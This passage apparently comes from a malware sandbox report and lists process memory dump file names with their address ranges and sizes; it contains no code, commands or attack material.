                              Filesize

                              480KB

                            • memory/2996-124-0x0000000000400000-0x0000000000478000-memory.dmp

                              Filesize

                              480KB

                            • memory/2996-123-0x0000000000400000-0x0000000000478000-memory.dmp

                              Filesize

                              480KB

                            • memory/3784-127-0x0000000000400000-0x0000000000462000-memory.dmp

                              Filesize

                              392KB

                            • memory/3784-134-0x0000000000400000-0x0000000000462000-memory.dmp

                              Filesize

                              392KB

                            • memory/3784-126-0x0000000000400000-0x0000000000462000-memory.dmp

                              Filesize

                              392KB

                            • memory/4224-128-0x0000000000400000-0x0000000000424000-memory.dmp

                              Filesize

                              144KB

                            • memory/4224-129-0x0000000000400000-0x0000000000424000-memory.dmp

                              Filesize

                              144KB

                            • memory/4224-130-0x0000000000400000-0x0000000000424000-memory.dmp

                              Filesize

                              144KB

                            • memory/4672-100-0x00000000079C0000-0x0000000007A5C000-memory.dmp

                              Filesize

                              624KB

                            • memory/4672-99-0x00000000077C0000-0x0000000007918000-memory.dmp

                              Filesize

                              1.3MB